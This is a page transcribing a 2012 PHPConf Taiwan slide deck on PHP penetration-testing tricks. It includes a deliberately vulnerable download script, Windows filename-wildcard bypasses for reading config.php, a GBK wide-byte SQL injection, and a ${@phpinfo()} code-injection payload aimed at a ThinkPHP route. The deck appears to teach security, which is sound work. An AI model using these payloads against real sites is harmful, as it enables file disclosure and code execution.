Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security in PHP 那些在滲透測試的小技巧

Sponsored · Your Podcast. Everywhere. Effortlessly. Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
Avatar for Orange Orange
August 21, 2024
260
0

Security in PHP 那些在滲透測試的小技巧

PHPConf Taiwan 2012

Avatar for Orange

Orange

August 21, 2024

More Decks by Orange

See All by Orange
Best Practices - The Upload
Avatar for Orange p8361
0
150
網頁安全 Web Security 入門
Avatar for Orange p8361
0
260
Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞
Avatar for Orange p8361
13
37k
那些 Web Hacking 中的奇技淫巧
Avatar for Orange p8361
16
15k
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
Avatar for Orange p8361
6
13k
PHPConf 2013 - 矛盾大對決
Avatar for Orange p8361
53
28k
0-Day 輕鬆談 - Happy Fuzzing Internet Explorer
Avatar for Orange p8361
15
12k
駭客看 Django
Avatar for Orange p8361
25
13k

Featured

See All Featured
The Anti-SEO Checklist Checklist. Pubcon Cyber Week
Avatar for Ryan Jones ryanjones
0
110
Leveraging LLMs for student feedback in introductory data science courses - posit::conf(2025)
Avatar for Mine Cetinkaya-Rundel minecr
1
220
Winning Ecommerce Organic Search in an AI Era - #searchnstuff2025
Avatar for Aleyda Solis aleyda
1
2k
Designing for humans not robots
Avatar for Tammie Lister tammielis
254
26k
GraphQLの誤解/rethinking-graphql
Avatar for sonatard sonatard
75
12k
What Being in a Rock Band Can Teach Us About Real World SEO
Avatar for Ade Holder 427marketing
0
210
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
Avatar for Michelle Schulp Hunt marktimemedia
31
2.7k
Fashionably flexible responsive web design (full day workshop)
Avatar for Andy Clarke malarkey
408
66k
The Illustrated Children's Guide to Kubernetes
Avatar for Chris Short chrisshort
51
52k
Joys of Absence: A Defence of Solitary Play
Avatar for Sebastian Deterding codingconduct
1
340
Code Reviewing Like a Champion
Avatar for maltzj maltzj
528
40k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
Avatar for Eileen M. Uchitelle eileencodes
27
3.4k

Transcript

  1. 2012/11/03 @ PHPCONF <[email protected]>

  2. • aka Orange • 2009 • 2011 • 2011 AVTOKYO

    • – – Web Security – Windows Vulnerability Exploitation

  3. • CHROOT Security Group • NISRA • case. • Blog

    – http://blog.orange.tw/
  4. None
  5. None
  6. None

  7. ▪▪

  8. None

  9. <?php $url = $_GET['url']; echo urlencode( $url ); ?>

  10. • Low – Sensitive Information Leakage… • Middle – Insecure

    File Download/Access… • High – Local File Inclusion, Code Injection, SQL Inj…
  11. None

  12. • – – –

  13. • showNews.php?id=198 – showNews.php?id=198/1 • checkName.php?u=lala – checkName.php?u=lala%cc' • getFile.php?path=hsu.doc

    – getFile.php?path=./hsu.doc • main.php?module=index – main.php?module[]=index
  14. None
  15. None

  16. 1. Router, Controller URL Mapping 2. 3. 4. DB ORM

    PHP orz

  17. 1. – system exec shell_exec popen eval create_function call_user_func preg_replace…

    2. – _GET _POST _COOKIE _REQUEST _ENV _FILES _SERVER HTTP_RAW_POST_DATA php://input getenv …

  18. • grep -Re – (include|require).+\$ – (eval|create_function|call_user_func|…).+\$ – (system|exec|shell_exec|passthru|…).+\$ –

    (select|insert|update|where|…).+\$ – (file_get_contents|readfile|fopen|…).+\$ – (unserialize|parse_str|…).+\$ – \$\$, $a\(\) – ……

  19. • grep -Re – \$(_GET|_POST|_COOKIE|_REQUEST|_FILES) – \$(_ENV|_SERVER) – getenv –

    HTTP_RAW_POST_DATA – php://input – …

  20. try { …… $trans->commit(); } catch (xxx_adapter_exception $e) { $trans->rollback();

    require_once 'xxx_exceptio$n.class.php' throw new xxx_exception( …… ); }
  21. None
  22. None

  23. <?php $name = $_GET['name']; $name = basename( $name ); if

    ( eregi( "(.php|.conf)$", $name ) ) exit( "Not Allow PHP." ); else readfile( DOCUMENT_ROOT. $name ); ?>

  24. • down.php?name= – config.php – config"php – config.ph> – config.<

    – c>>>>>"< – c<"< Test on PHP 5.4.8 newest stable version (2012/10/17) Original Will be replaced by < * > ? " .
  25. None

  26. • file_get_contents – > php_stream_open_wrapper_ex – > zend_resolve_path – >

    php_resolve_path_for_zend – > php_resolve_path – > tsrm_realpath – > virtual_file_ex – > tsrm_realpath_r
  27. None

  28. • file_get_contents • file_put_contents • file • readfile • phar_file_get_contents

    • include • include_once • require • require_once • fopen • opendir • readdir • mkdir • ……
  29. None

  30. • config.php/. • config.php///. • c>>>>>.</// Works on PHP 5.2.*

    (2012/10/26)
  31. None

  32. • Web Browser PHP Output (HTML) – Cross-Site Scripting •

    DB Management PHP Output (SQL) – SQL Injection

  33. SELECT * FROM [table] WHERE username = 'PHPCONF'

  34. SELECT * FROM [table] WHERE username = 'PHPCONF\''

  35. SELECT * FROM [table] WHERE username = 'PHPCONF%cc\''

  36. Σ( ° △ °|||)︴ Before After PHPCONF PHPCONF PHPCONF' PHPCONF\'

    PHPCONF%80' PHPCONF�\' PHPCONF%cc' PHPCONF岤' 0x81-0xFE 0x40-0x7E 0xA1-0xFE

  37. • addslashes • mysql_escape_string • magic_quote_gpc • Special Cases –

    pdo – mysql_real_escape_st ring
  38. None

  39. • $url = "http://phpconf.tw/2012/"; • $url = "http://phpconf.tw/$year/"; • $url

    = "http://phpconf.tw/{$year}/"; • $url = "http://phpconf.tw/{${phpinfo()}}/"; • $url = "http://phpconf.tw/${@phpinfo()}/";

  40. config.php $dbuser = "root";

  41. config.php $dbuser = "${@phpinfo()}";

  42. $res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); https://orange.tw/index.php?s=module/action/ param1/${@phpinfo()}

  43. Think PHP

  44. None

  45. – – – – – –

  46. • PHP Security – http://blog.php-security.org/ • Oddities of PHP file

    access in Windows®. – http://onsec.ru/onsec.whitepaper-02.eng.pdf
  47. None